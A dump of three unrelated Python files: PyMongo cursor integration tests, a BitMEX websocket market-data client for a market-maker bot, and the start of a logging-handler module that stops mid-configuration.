id(cursor2._Cursor__spec))
self.assertEqual(id(cursor2._Cursor__spec['reflexive']),
id(cursor2._Cursor__spec))
self.assertEqual(len(cursor2._Cursor__spec), 2)
# Ensure hints are cloned as the correct type
cursor = self.db.test.find().hint([('z', 1), ("a", 1)])
cursor2 = copy.deepcopy(cursor)
self.assertTrue(isinstance(cursor2._Cursor__hint, SON))
self.assertEqual(cursor._Cursor__hint, cursor2._Cursor__hint)
@ignore_deprecations
def test_count_with_fields(self):
self.db.test.drop()
self.db.test.insert_one({"x": 1})
self.assertEqual(1, self.db.test.find({}, ["a"]).count())
def test_bad_getitem(self):
self.assertRaises(TypeError, lambda x: self.db.test.find()[x], "hello")
self.assertRaises(TypeError, lambda x: self.db.test.find()[x], 5.5)
self.assertRaises(TypeError, lambda x: self.db.test.find()[x], None)
def test_getitem_slice_index(self):
self.db.drop_collection("test")
self.db.test.insert_many([{"i": i} for i in range(100)])
count = itertools.count
self.assertRaises(IndexError, lambda: self.db.test.find()[-1:])
self.assertRaises(IndexError, lambda: self.db.test.find()[1:2:2])
for a, b in zip(count(0), self.db.test.find()):
self.assertEqual(a, b['i'])
self.assertEqual(100, len(list(self.db.test.find()[0:])))
for a, b in zip(count(0), self.db.test.find()[0:]):
self.assertEqual(a, b['i'])
self.assertEqual(80, len(list(self.db.test.find()[20:])))
for a, b in zip(count(20), self.db.test.find()[20:]):
self.assertEqual(a, b['i'])
for a, b in zip(count(99), self.db.test.find()[99:]):
self.assertEqual(a, b['i'])
for i in self.db.test.find()[1000:]:
self.fail()
self.assertEqual(5, len(list(self.db.test.find()[20:25])))
self.assertEqual(5, len(list(
self.db.test.find()[long(20):long(25)])))
for a, b in zip(count(20), self.db.test.find()[20:25]):
self.assertEqual(a, b['i'])
self.assertEqual(80, len(list(self.db.test.find()[40:45][20:])))
for a, b in zip(count(20), self.db.test.find()[40:45][20:]):
self.assertEqual(a, b['i'])
self.assertEqual(80,
len(list(self.db.test.find()[40:45].limit(0).skip(20))
)
)
for a, b in zip(count(20),
self.db.test.find()[40:45].limit(0).skip(20)):
self.assertEqual(a, b['i'])
self.assertEqual(80,
len(list(self.db.test.find().limit(10).skip(40)[20:]))
)
for a, b in zip(count(20),
self.db.test.find().limit(10).skip(40)[20:]):
self.assertEqual(a, b['i'])
self.assertEqual(1, len(list(self.db.test.find()[:1])))
self.assertEqual(5, len(list(self.db.test.find()[:5])))
self.assertEqual(1, len(list(self.db.test.find()[99:100])))
self.assertEqual(1, len(list(self.db.test.find()[99:1000])))
self.assertEqual(0, len(list(self.db.test.find()[10:10])))
self.assertEqual(0, len(list(self.db.test.find()[:0])))
self.assertEqual(80,
len(list(self.db.test.find()[10:10].limit(0).skip(20))
)
)
self.assertRaises(IndexError, lambda: self.db.test.find()[10:8])
def test_getitem_numeric_index(self):
self.db.drop_collection("test")
self.db.test.insert_many([{"i": i} for i in range(100)])
self.assertEqual(0, self.db.test.find()[0]['i'])
self.assertEqual(50, self.db.test.find()[50]['i'])
self.assertEqual(50, self.db.test.find().skip(50)[0]['i'])
self.assertEqual(50, self.db.test.find().skip(49)[1]['i'])
self.assertEqual(50, self.db.test.find()[long(50)]['i'])
self.assertEqual(99, self.db.test.find()[99]['i'])
self.assertRaises(IndexError, lambda x: self.db.test.find()[x], -1)
self.assertRaises(IndexError, lambda x: self.db.test.find()[x], 100)
self.assertRaises(IndexError,
lambda x: self.db.test.find().skip(50)[x], 50)
@ignore_deprecations
def test_count_with_limit_and_skip(self):
self.assertRaises(TypeError, self.db.test.find().count, "foo")
def check_len(cursor, length):
self.assertEqual(len(list(cursor)), cursor.count(True))
self.assertEqual(length, cursor.count(True))
self.db.drop_collection("test")
self.db.test.insert_many([{"i": i} for i in range(100)])
check_len(self.db.test.find(), 100)
check_len(self.db.test.find().limit(10), 10)
check_len(self.db.test.find().limit(110), 100)
check_len(self.db.test.find().skip(10), 90)
check_len(self.db.test.find().skip(110), 0)
check_len(self.db.test.find().limit(10).skip(10), 10)
check_len(self.db.test.find()[10:20], 10)
check_len(self.db.test.find().limit(10).skip(95), 5)
check_len(self.db.test.find()[95:105], 5)
def test_len(self):
self.assertRaises(TypeError, len, self.db.test.find())
def test_properties(self):
self.assertEqual(self.db.test, self.db.test.find().collection)
def set_coll():
self.db.test.find().collection = "hello"
self.assertRaises(AttributeError, set_coll)
def test_get_more(self):
db = self.db
db.drop_collection("test")
db.test.insert_many([{'i': i} for i in range(10)])
self.assertEqual(10, len(list(db.test.find().batch_size(5))))
def test_tailable(self):
db = self.db
db.drop_collection("test")
db.create_collection("test", capped=True, size=1000, max=3)
self.addCleanup(db.drop_collection, "test")
cursor = db.test.find(cursor_type=CursorType.TAILABLE)
db.test.insert_one({"x": 1})
count = 0
for doc in cursor:
count += 1
self.assertEqual(1, doc["x"])
self.assertEqual(1, count)
db.test.insert_one({"x": 2})
count = 0
for doc in cursor:
count += 1
self.assertEqual(2, doc["x"])
self.assertEqual(1, count)
db.test.insert_one({"x": 3})
count = 0
for doc in cursor:
count += 1
self.assertEqual(3, doc["x"])
self.assertEqual(1, count)
# Capped rollover - the collection can never
# have more than 3 documents. Just make sure
# this doesn't raise...
db.test.insert_many([{"x": i} for i in range(4, 7)])
self.assertEqual(0, len(list(cursor)))
# and that the cursor doesn't think it's still alive.
self.assertFalse(cursor.alive)
self.assertEqual(3, db.test.count_documents({}))
# __getitem__(index)
for cursor in (db.test.find(cursor_type=CursorType.TAILABLE),
db.test.find(cursor_type=CursorType.TAILABLE_AWAIT)):
self.assertEqual(4, cursor[0]["x"])
self.assertEqual(5, cursor[1]["x"])
self.assertEqual(6, cursor[2]["x"])
cursor.rewind()
self.assertEqual([4], [doc["x"] for doc in cursor[0:1]])
cursor.rewind()
self.assertEqual([5], [doc["x"] for doc in cursor[1:2]])
cursor.rewind()
self.assertEqual([6], [doc["x"] for doc in cursor[2:3]])
cursor.rewind()
self.assertEqual([4, 5], [doc["x"] for doc in cursor[0:2]])
cursor.rewind()
self.assertEqual([5, 6], [doc["x"] for doc in cursor[1:3]])
cursor.rewind()
self.assertEqual([4, 5, 6], [doc["x"] for doc in cursor[0:3]])
def test_concurrent_close(self):
"""Ensure a tailable can be closed from another thread."""
db = self.db
db.drop_collection("test")
db.create_collection("test", capped=True, size=1000, max=3)
self.addCleanup(db.drop_collection, "test")
cursor = db.test.find(cursor_type=CursorType.TAILABLE)
def iterate_cursor():
while cursor.alive:
for doc in cursor:
pass
t = threading.Thread(target=iterate_cursor)
t.start()
time.sleep(1)
cursor.close()
self.assertFalse(cursor.alive)
t.join(3)
self.assertFalse(t.is_alive())
def test_distinct(self):
self.db.drop_collection("test")
self.db.test.insert_many(
[{"a": 1}, {"a": 2}, {"a": 2}, {"a": 2}, {"a": 3}])
distinct = self.db.test.find({"a": {"$lt": 3}}).distinct("a")
distinct.sort()
self.assertEqual([1, 2], distinct)
self.db.drop_collection("test")
self.db.test.insert_one({"a": {"b": "a"}, "c": 12})
self.db.test.insert_one({"a": {"b": "b"}, "c": 8})
self.db.test.insert_one({"a": {"b": "c"}, "c": 12})
self.db.test.insert_one({"a": {"b": "c"}, "c": 8})
distinct = self.db.test.find({"c": 8}).distinct("a.b")
distinct.sort()
self.assertEqual(["b", "c"], distinct)
@client_context.require_version_max(4, 1, 0, -1)
def test_max_scan(self):
self.db.drop_collection("test")
self.db.test.insert_many([{} for _ in range(100)])
self.assertEqual(100, len(list(self.db.test.find())))
self.assertEqual(50, len(list(self.db.test.find().max_scan(50))))
self.assertEqual(50, len(list(self.db.test.find()
.max_scan(90).max_scan(50))))
def test_with_statement(self):
self.db.drop_collection("test")
self.db.test.insert_many([{} for _ in range(100)])
c1 = self.db.test.find()
with self.db.test.find() as c2:
self.assertTrue(c2.alive)
self.assertFalse(c2.alive)
with self.db.test.find() as c2:
self.assertEqual(100, len(list(c2)))
self.assertFalse(c2.alive)
self.assertTrue(c1.alive)
@client_context.require_no_mongos
@ignore_deprecations
def test_comment(self):
# MongoDB 3.1.5 changed the ns for commands.
regex = {'$regex': r'pymongo_test.(\$cmd|test)'}
if client_context.version.at_least(3, 5, 8, -1):
query_key = "command.comment"
elif client_context.version.at_least(3, 1, 8, -1):
query_key = "query.comment"
else:
query_key = "query.$comment"
self.client.drop_database(self.db)
self.db.set_profiling_level(ALL)
try:
list(self.db.test.find().comment('foo'))
op = self.db.system.profile.find({'ns': 'pymongo_test.test',
'op': 'query',
query_key: 'foo'})
self.assertEqual(op.count(), 1)
self.db.test.find().comment('foo').count()
op = self.db.system.profile.find({'ns': regex,
'op': 'command',
'command.count': 'test',
'command.comment': 'foo'})
self.assertEqual(op.count(), 1)
self.db.test.find().comment('foo').distinct('type')
op = self.db.system.profile.find({'ns': regex,
'op': 'command',
'command.distinct': 'test',
'command.comment': 'foo'})
self.assertEqual(op.count(), 1)
finally:
self.db.set_profiling_level(OFF)
self.db.system.profile.drop()
self.db.test.insert_many([{}, {}])
cursor = self.db.test.find()
next(cursor)
self.assertRaises(InvalidOperation, cursor.comment, 'hello')
def test_modifiers(self):
c = self.db.test
# "modifiers" is deprecated.
with ignore_deprecations():
cur = c.find()
self.assertTrue('$query' not in cur._Cursor__query_spec())
cur = c.find().comment("testing").max_time_ms(500)
self.assertTrue('$query' in cur._Cursor__query_spec())
self.assertEqual(cur._Cursor__query_spec()["$comment"], "testing")
self.assertEqual(cur._Cursor__query_spec()["$maxTimeMS"], 500)
cur = c.find(
modifiers={"$maxTimeMS": 500, "$comment": "testing"})
self.assertTrue('$query' in cur._Cursor__query_spec())
self.assertEqual(cur._Cursor__query_spec()["$comment"], "testing")
self.assertEqual(cur._Cursor__query_spec()["$maxTimeMS"], 500)
# Keyword arg overwrites modifier.
# If we remove the "modifiers" arg, delete this test after checking
# that TestCommandMonitoring.test_find_options covers all cases.
cur = c.find(comment="hi", modifiers={"$comment": "bye"})
self.assertEqual(cur._Cursor__query_spec()["$comment"], "hi")
cur = c.find(max_scan=1, modifiers={"$maxScan": 2})
self.assertEqual(cur._Cursor__query_spec()["$maxScan"], 1)
cur = c.find(max_time_ms=1, modifiers={"$maxTimeMS": 2})
self.assertEqual(cur._Cursor__query_spec()["$maxTimeMS"], 1)
cur = c.find(min=1, modifiers={"$min": 2})
self.assertEqual(cur._Cursor__query_spec()["$min"], 1)
cur = c.find(max=1, modifiers={"$max": 2})
self.assertEqual(cur._Cursor__query_spec()["$max"], 1)
cur = c.find(return_key=True, modifiers={"$returnKey": False})
self.assertEqual(cur._Cursor__query_spec()["$returnKey"], True)
cur = c.find(hint=[("a", 1)], modifiers={"$hint": {"b": "1"}})
self.assertEqual(cur._Cursor__query_spec()["$hint"], {"a": 1})
# The arg is named show_record_id after the "find" command arg, the
# modifier is named $showDiskLoc for the OP_QUERY modifier. It's
# stored as $showDiskLoc then upgraded to showRecordId if we send a
# "find" command.
cur = c.find(show_record_id=True, modifiers={"$showDiskLoc": False})
self.assertEqual(cur._Cursor__query_spec()["$showDiskLoc"], True)
if not client_context.version.at_least(3, 7, 3):
cur = c.find(snapshot=True, modifiers={"$snapshot": False})
self.assertEqual(cur._Cursor__query_spec()["$snapshot"], True)
def test_alive(self):
self.db.test.delete_many({})
self.db.test.insert_many([{} for _ in range(3)])
self.addCleanup(self.db.test.delete_many, {})
cursor = self.db.test.find().batch_size(2)
n = 0
while True:
cursor.next()
n += 1
if 3 == n:
self.assertFalse(cursor.alive)
break
self.assertTrue(cursor.alive)
def test_close_kills_cursor_synchronously(self):
# Kill any cursors possibly queued up by previous tests.
gc.collect()
self.client._process_periodic_tasks()
listener = WhiteListEventListener("killCursors")
results = listener.results
client = rs_or_single_client(event_listeners=[listener])
self.addCleanup(client.close)
coll = client[self.db.name].test_close_kills_cursors
# Add some test data.
docs_inserted = 1000
coll.insert_many([{"i": i} for i in range(docs_inserted)])
results.clear()
# Close a cursor while it's still open on the server.
cursor = coll.find().batch_size(10)
self.assertTrue(bool(next(cursor)))
self.assertLess(cursor.retrieved, docs_inserted)
cursor.close()
def assertCursorKilled():
self.assertEqual(1, len(results["started"]))
self.assertEqual("killCursors", results["started"][0].command_name)
self.assertEqual(1, len(results["succeeded"]))
self.assertEqual("killCursors",
results["succeeded"][0].command_name)
assertCursorKilled()
results.clear()
# Close a command cursor while it's still open on the server.
cursor = coll.aggregate([], batchSize=10)
self.assertTrue(bool(next(cursor)))
cursor.close()
# The cursor should be killed if it had a non-zero id.
if cursor.cursor_id:
assertCursorKilled()
else:
self.assertEqual(0, len(results["started"]))
def test_delete_not_initialized(self):
# Creating a cursor with invalid arguments will not run __init__
# but will still call __del__, eg test.find(invalidKwarg=1).
cursor = Cursor.__new__(Cursor) # Skip calling __init__
cursor.__del__() # no error
@client_context.require_version_min(3, 6)
def test_getMore_does_not_send_readPreference(self):
listener = WhiteListEventListener('find', 'getMore')
client = rs_or_single_client(
event_listeners=[listener])
self.addCleanup(client.close)
coll = client[self.db.name].test
coll.delete_many({})
coll.insert_many([{} for _ in range(5)])
self.addCleanup(coll.drop)
list(coll.find(batch_size=3))
started = listener.results['started']
self.assertEqual(2, len(started))
self.assertEqual('find', started[0].command_name)
self.assertIn('$readPreference', started[0].command)
self.assertEqual('getMore', started[1].command_name)
self.assertNotIn('$readPreference', started[1].command)
class TestRawBatchCursor(IntegrationTest):
def test_find_raw(self):
c = self.db.test
c.drop()
docs = [{'_id': i, 'x': 3.0 * i} for i in range(10)]
c.insert_many(docs)
batches = list(c.find_raw_batches().sort('_id'))
self.assertEqual(1, len(batches))
self.assertEqual(docs, decode_all(batches[0]))
def test_manipulate(self):
c = self.db.test
with self.assertRaises(InvalidOperation):
c.find_raw_batches(manipulate=True)
def test_explain(self):
c = self.db.test
c.insert_one({})
explanation = c.find_raw_batches().explain()
self.assertIsInstance(explanation, dict)
def test_clone(self):
cursor = self.db.test.find_raw_batches()
# Copy of a RawBatchCursor is also a RawBatchCursor, not a Cursor.
self.assertIsInstance(next(cursor.clone()), bytes)
self.assertIsInstance(next(copy.copy(cursor)), bytes)
@client_context.require_no_mongos
def test_exhaust(self):
c = self.db.test
c.drop()
c.insert_many({'_id': i} for i in range(200))
result = b''.join(c.find_raw_batches(cursor_type=CursorType.EXHAUST))
self.assertEqual([{'_id': i} for i in range(200)], decode_all(result))
def test_server_error(self):
with self.assertRaises(OperationFailure) as exc:
next(self.db.test.find_raw_batches({'x': {'$bad': 1}}))
# The server response was decoded, not left raw.
self.assertIsInstance(exc.exception.details, dict)
def test_get_item(self):
with self.assertRaises(InvalidOperation):
self.db.test.find_raw_batches()[0]
@client_context.require_version_min(3, 4)
def test_collation(self):
next(self.db.test.find_raw_batches(collation=Collation('en_US')))
@client_context.require_version_max(3, 2)
def test_collation_error(self):
with self.assertRaises(ConfigurationError):
next(self.db.test.find_raw_batches(collation=Collation('en_US')))
@client_context.require_version_min(3, 2)
def test_read_concern(self):
c = self.db.get_collection("test", read_concern=ReadConcern("majority"))
next(c.find_raw_batches())
@client_context.require_version_max(3, 1)
def test_read_concern_error(self):
c = self.db.get_collection("test", read_concern=ReadConcern("majority"))
with self.assertRaises(ConfigurationError):
next(c.find_raw_batches())
def test_monitoring(self):
listener = EventListener()
client = rs_or_single_client(event_listeners=[listener])
c = client.pymongo_test.test
c.drop()
c.insert_many([{'_id': i} for i in range(10)])
listener.results.clear()
cursor = c.find_raw_batches(batch_size=4)
# First raw batch of 4 documents.
next(cursor)
started = listener.results['started'][0]
succeeded = listener.results['succeeded'][0]
self.assertEqual(0, len(listener.results['failed']))
self.assertEqual('find', started.command_name)
self.assertEqual('pymongo_test', started.database_name)
self.assertEqual('find', succeeded.command_name)
csr = succeeded.reply["cursor"]
self.assertEqual(csr["ns"], "pymongo_test.test")
# The batch is a list of one raw bytes object.
self.assertEqual(len(csr["firstBatch"]), 1)
self.assertEqual(decode_all(csr["firstBatch"][0]),
[{'_id': i} for i in range(0, 4)])
listener.results.clear()
# Next raw batch of 4 documents.
next(cursor)
try:
results = listener.results
started = results['started'][0]
succeeded = results['succeeded'][0]
self.assertEqual(0, len(results['failed']))
self.assertEqual('getMore', started.command_name)
self.assertEqual('pymongo_test', started.database_name)
self.assertEqual('getMore', succeeded.command_name)
csr = succeeded.reply["cursor"]
self.assertEqual(csr["ns"], "pymongo_test.test")
self.assertEqual(len(csr["nextBatch"]), 1)
self.assertEqual(decode_all(csr["nextBatch"][0]),
[{'_id': i} for i in range(4, 8)])
finally:
# Finish the cursor.
tuple(cursor)
class TestRawBatchCommandCursor(IntegrationTest):
@classmethod
def setUpClass(cls):
super(TestRawBatchCommandCursor, cls).setUpClass()
def test_aggregate_raw(self):
c = self.db.test
c.drop()
docs = [{'_id': i, 'x': 3.0 * i} for i in range(10)]
c.insert_many(docs)
batches = list(c.aggregate_raw_batches([{'$sort': {'_id': 1}}]))
self.assertEqual(1, len(batches))
self.assertEqual(docs, decode_all(batches[0]))
def test_server_error(self):
c = self.db.test
c.drop()
docs = [{'_id': i, 'x': 3.0 * i} for i in range(10)]
c.insert_many(docs)
c.insert_one({'_id': 10, 'x': 'not a number'})
with self.assertRaises(OperationFailure) as exc:
list(self.db.test.aggregate_raw_batches([{
'$sort': {'_id': 1},
}, {
'$project': {'x': {'$multiply': [2, '$x']}}
}], batchSize=4))
# The server response was decoded, not left raw.
self.assertIsInstance(exc.exception.details, dict)
def test_get_item(self):
with self.assertRaises(InvalidOperation):
self.db.test.aggregate_raw_batches([])[0]
@client_context.require_version_min(3, 4)
def test_collation(self):
next(self.db.test.aggregate_raw_batches([], collation=Collation('en_US')))
@client_context.require_version_max(3, 2)
def test_collation_error(self):
with self.assertRaises(ConfigurationError):
next(self.db.test.aggregate_raw_batches([], collation=Collation('en_US')))
def test_monitoring(self):
listener = EventListener()
client = rs_or_single_client(event_listeners=[listener])
c = client.pymongo_test.test
c.drop()
c.insert_many([{'_id': i} for i in range(10)])
listener.results.clear()
cursor = c.aggregate_raw_batches([{'$sort': {'_id': 1}}], batchSize=4)
# Start cursor, no initial batch.
started = listener.results['started'][0]
succeeded = listener.results['succeeded'][0]
self.assertEqual(0, len(listener.results['failed']))
self.assertEqual('aggregate', started.command_name)
self.assertEqual('pymongo_test', started.database_name)
self.assertEqual('aggregate', succeeded.command_name)
csr = succeeded.reply["cursor"]
self.assertEqual(csr["ns"], "pymongo_test.test")
# First batch is empty.
self.assertEqual(len(csr["firstBatch"]), 0)
listener.results.clear()
# Batches of 4 documents.
n = 0
for batch in cursor:
results = listener.results
started = results['started'][0]
succeeded = results['succeeded'][0]
self.assertEqual(0, len(results['failed']))
self.assertEqual('getMore', started.command_name)
self.assertEqual('pymongo_test', started.database_name)
self.assertEqual('getMore', succeeded.command_name)
csr = succeeded.reply["cursor"]
self.assertEqual(csr["ns"], "pymongo_test.test")
self.assertEqual(len(csr["nextBatch"]), 1)
self.assertEqual(csr["nextBatch"][0], batch)
self.assertEqual(decode_all(batch),
[{'_id': i} for i in range(n, min(n + 4, 10))])
n += 4
listener.results.clear()
if __name__ == "__main__":
unittest.main()
|
ws_thread.py
|
import sys
import websocket
import threading
import traceback
import ssl
from time import sleep
import time
import json
import decimal
import datetime as dt
import logging
from market_maker.settings import settings
from market_maker.auth.APIKeyAuth import generate_expires, generate_signature
from market_maker.utils.log import setup_custom_logger
from market_maker.utils.math import toNearest
from future.utils import iteritems
from future.standard_library import hooks
with hooks(): # Python 2/3 compat
from urllib.parse import urlparse, urlunparse
# Connects to BitMEX websocket for streaming realtime data.
# The Marketmaker still interacts with this as if it were a REST Endpoint, but now it can get
# much more realtime data without heavily polling the API.
#
# The Websocket offers a bunch of data as raw properties right on the object.
# On connect, it synchronously asks for a push of all this data then returns.
# Right after, the MM can start using its data. It will be updated in realtime, so the MM can
# poll as often as it wants.
class BitMEXWebsocket():
# Don't grow a table larger than this amount. Helps cap memory usage.
MAX_TABLE_LEN = 1000
def __init__(self):
self.logger = logging.getLogger('root')
self.__reset()
def __del__(self):
self.exit()
def connect(self, endpoint="", symbol="XBTUSD", shouldAuth=False):
'''Connect to the websocket and initialize data stores.'''
self.logger.debug("Connecting WebSocket.")
self.symbol = symbol
self.shouldAuth = shouldAuth
# We can subscribe right in the connection querystring, so let's build that.
# Subscribe to all pertinent endpoints
#subscriptions = [sub + ':' + symbol for sub in ["quote", "trade"]]
#subscriptions = [sub + ':' + symbol for sub in ["orderBookL2", "trade"]]
subscriptions = [sub + ':' + symbol for sub in ["trade"]]
#subscriptions += ["instrument"] # We want all of them
if self.shouldAuth:
subscriptions += [sub + ':' + symbol for sub in ["order", "execution"]]
subscriptions += ["margin", "position"]
# Get WS URL and connect.
urlParts = list(urlparse(endpoint))
urlParts[0] = urlParts[0].replace('http', 'ws')
urlParts[2] = "/realtime?subscribe=" + ",".join(subscriptions)
wsURL = urlunparse(urlParts)
self.logger.info("Connecting to %s" % wsURL)
self.__connect(wsURL)
self.logger.info('Connected to WS. Waiting for data images, this may take a moment...')
# Connected. Wait for partials
self.__wait_for_symbol(symbol)
if self.shouldAuth:
self.__wait_for_account()
self.logger.info('Got all market data. Starting.')
#
# Data methods
#
def get_instrument(self, symbol):
instruments = self.data['instrument']
matchingInstruments = [i for i in instruments if i['symbol'] == symbol]
if len(matchingInstruments) == 0:
raise Exception("Unable to find instrument or index with symbol: " + symbol)
instrument = matchingInstruments[0]
# Turn the 'tickSize' into 'tickLog' for use in rounding
# http://stackoverflow.com/a/6190291/832202
instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])).as_tuple().exponent * -1
return instrument
def get_ticker(self, symbol):
'''Return a ticker object. Generated from instrument.'''
instrument = self.get_instrument(symbol)
# If this is an index, we have to get the data from the last trade.
if instrument['symbol'][0] == '.':
ticker = {}
ticker['mid'] = ticker['buy'] = ticker['sell'] = ticker['last'] = instrument['markPrice']
# Normal instrument
else:
bid = instrument['bidPrice'] or instrument['lastPrice']
ask = instrument['askPrice'] or instrument['lastPrice']
ticker = {
"last": instrument['lastPrice'],
"buy": bid,
"sell": ask,
"mid": (bid + ask) / 2
}
# The instrument has a tickSize. Use it to round values.
return {k: toNearest(float(v or 0), instrument['tickSize']) for k, v in iteritems(ticker)}
def funds(self):
return self.data['margin'][0]
def market_depth(self, symbol):
raise NotImplementedError('orderBook is not subscribed; use askPrice and bidPrice on instrument')
# return self.data['orderBook25'][0]
def open_orders(self, clOrdIDPrefix):
orders = self.data['order']
# Filter to only open orders (leavesQty > 0) and those that we actually placed
return [o for o in orders if str(o['clOrdID']).startswith(clOrdIDPrefix) and o['leavesQty'] > 0]
def position(self, symbol):
positions = self.data['position']
pos = [p for p in positions if p['symbol'] == symbol]
if len(pos) == 0:
# No position found; stub it
return {'avgCostPrice': 0, 'avgEntryPrice': 0, 'currentQty': 0, 'symbol': symbol}
return pos[0]
def recent_trades(self):
return self.data['trade']
#
# Lifecycle methods
#
def error(self, err):
self._error = err
self.logger.error(err)
self.exit()
def exit(self):
self.exited = True
self.ws.close()
#
# Private methods
#
def __connect(self, wsURL):
'''Connect to the websocket in a thread.'''
self.logger.debug("Starting thread")
ssl_defaults = ssl.get_default_verify_paths()
sslopt_ca_certs = {'ca_certs': ssl_defaults.cafile}
self.ws = websocket.WebSocketApp(wsURL,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error,
header=self.__get_auth()
)
setup_custom_logger('websocket', log_level=settings.LOG_LEVEL)
self.wst = threading.Thread(target=lambda: self.ws.run_forever(sslopt=sslopt_ca_certs))
self.wst.daemon = True
self.wst.start()
self.logger.info("Started thread")
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout and not self._error:
sleep(1)
conn_timeout -= 1
if not conn_timeout or self._error:
self.logger.error("Couldn't connect to WS! Exiting.")
self.exit()
sys.exit(1)
def __get_auth(self):
'''Return auth headers. Will use API Keys if present in settings.'''
if self.shouldAuth is False:
return []
self.logger.info("Authenticating with API Key.")
# To auth to the WS using an API key, we generate a signature of a nonce and
# the WS API endpoint.
nonce = generate_expires()
return [
"api-expires: " + str(nonce),
"api-signature: " + generate_signature(settings.API_SECRET, 'GET', '/realtime', nonce, ''),
"api-key:" + settings.API_KEY
]
def __wait_for_account(self):
'''On subscribe, this data will come down. Wait for it.'''
# Wait for the keys to show up from the ws
while not {'margin', 'position', 'order'} <= set(self.data):
sleep(0.1)
def __wait_for_symbol(self, symbol):
'''On subscribe, this data will come down. Wait for it.'''
while not {'instrument', 'trade', 'quote'} <= set(self.data):
sleep(0.1)
def __send_command(self, command, args):
'''Send a raw command.'''
self.ws.send(json.dumps({"op": command, "args": args or []}))
def __on_message(self, message):
'''Handler for parsing WS messages.'''
receive_time = dt.datetime.fromtimestamp(time.time())
receive_time = dt.datetime.strftime(receive_time, "%H:%M:%S.%f")
# not sure why this loggeradapter not working
#self.logger = logging.LoggerAdapter(self.logger, extra={'receive_time': receive_time})
print(receive_time)
message = json.loads(message)
self.logger.debug(json.dumps(message))
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
try:
if 'subscribe' in message:
if message['success']:
self.logger.debug("Subscribed to %s." % message['subscribe'])
else:
self.error("Unable to subscribe to %s. Error: \"%s\" Please check and restart." %
(message['request']['args'][0], message['error']))
elif 'status' in message:
if message['status'] == 400:
self.error(message['error'])
if message['status'] == 401:
self.error("API Key incorrect, please check and restart.")
elif action:
if table not in self.data:
self.data[table] = []
if table not in self.keys:
self.keys[table] = []
# There are four possible actions from the WS:
# 'partial' - full table image
# 'insert' - new row
# 'update' - update row
# 'delete' - delete row
if action == 'partial':
self.logger.debug("%s: partial" % table)
self.data[table] += message['data']
# Keys are communicated on partials to let you know how to uniquely identify
# an item. We use it for updates.
self.keys[table] = message['keys']
elif action == 'insert':
self.logger.debug('%s: inserting %s' % (table, message['data']))
self.data[table] += message['data']
# Limit the max length of the table to avoid excessive memory usage.
# Don't trim orders because we'll lose valuable state if we do.
if table not in ['order', 'orderBookL2'] and len(self.data[table]) > BitMEXWebsocket.MAX_TABLE_LEN:
self.data[table] = self.data[table][(BitMEXWebsocket.MAX_TABLE_LEN // 2):]
elif action == 'update':
self.logger.debug('%s: updating %s' % (table, message['data']))
# Locate the item in the collection and update it.
for updateData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], updateData)
if not item:
continue # No item found to update. Could happen before push
# Log executions
if table == 'order':
is_canceled = 'ordStatus' in updateData and updateData['ordStatus'] == 'Canceled'
if 'cumQty' in updateData and not is_canceled:
contExecuted = updateData['cumQty'] - item['cumQty']
if contExecuted > 0:
instrument = self.get_instrument(item['symbol'])
self.logger.info("Execution: %s %d Contracts of %s at %.*f" %
(item['side'], contExecuted, item['symbol'],
instrument['tickLog'], item['price']))
# Update this item.
item.update(updateData)
# Remove canceled / filled orders
if table == 'order' and item['leavesQty'] <= 0:
self.data[table].remove(item)
elif action == 'delete':
self.logger.debug('%s: deleting %s' % (table, message['data']))
# Locate the item in the collection and remove it.
for deleteData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], deleteData)
self.data[table].remove(item)
else:
raise Exception("Unknown action: %s" % action)
except:
self.logger.error(traceback.format_exc())
def __on_open(self):
self.logger.debug("Websocket Opened.")
def __on_close(self):
self.logger.info('Websocket Closed')
self.exit()
def __on_error(self, ws, error):
if not self.exited:
self.error(error)
def __reset(self):
self.data = {}
self.keys = {}
self.exited = False
self._error = None
def findItemByKeys(keys, table, matchData):
for item in table:
matched = True
for key in keys:
if item[key] != matchData[key]:
matched = False
if matched:
return item
if __name__ == "__main__":
# create console handler and set level to debug
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
#fh = logging.FileHandler('/home/hh2010/2019-12-09-pm-trd.log')
#fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
# create formatter
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
# add formatter to ch
ch.setFormatter(formatter)
logger.addHandler(ch)
#logger.addHandler(fh)
ws = BitMEXWebsocket()
ws.logger = logger
ws.connect("https://www.bitmex.com/api/v1")
while(ws.ws.sock.connected):
sleep(1)
|
logging_handler.py
|
import logging
import logging.config
import logging.handlers
import threading
from multiprocessing import Queue
_console_log = 15
class LogLevelFilter(logging.Filter):
def __init__(self, param=None):
self._level = param
def filter(self, record):
return record.levelno in self._level and record.levelno >= _console_log
class LogInfoLevelFilter(logging.Filter):
def __init__(self, param=None):
self._level = param
def filter(self, record):
if self._level == 25 and record.levelno == 25:
return True
if self._level == 25 and record.levelno == 10:
return True
if self._level == 10 and record.levelno ==10 :
return True
return False
def logger_thread(q):
while True:
record = q.get()
if record is None:
break
logger = logging.getLogger(record.name)
logger.handle(record)
class KerviLogHandler:
def __init__(self, config):
import platform
log_level = config.log.level
if log_level == "debug":
log_level = logging.DEBUG
if log_level == "verbose":
log_level = 15
if log_level == "info":
log_level = logging.INFO
if log_level == "warning":
log_level = logging.WARNING
if log_level == "error":
log_level = logging.ERROR
console_level = config.log.console_level
if console_level == "debug":
_console_log = logging.DEBUG
if console_level == "verbose":
_console_log = 15
if console_level == "info":
_console_log = logging.INFO
if log_level == "warning":
_console_log = logging.WARNING
if log_level == "error":
_console_log = logging.ERROR
log_config = {
'version': 1,
'filters':{
'info':{
'()': LogLevelFilter,
'param': [logging.INFO]
},
'verbose':{
'()': LogLevelFilter,
'param': [15]
},
'warning':{
'()': LogLevelFilter,
'param': [logging.WARNING]
},
'error':{
'()': LogLevelFilter,
'param': [logging.ERROR]
}
},
'formatters': {
'detailed': {
'class': 'logging.Formatter',
'format': '%(asctime)s %(name)-15s %(levelname)-8s %(processName)-10s %(message)s'
},
'console': {
'class': 'logging.Formatter',
'format': '\033[92m%(message)s \033[0m',
},
'console-verbose': {
'class': 'logging.Formatter',
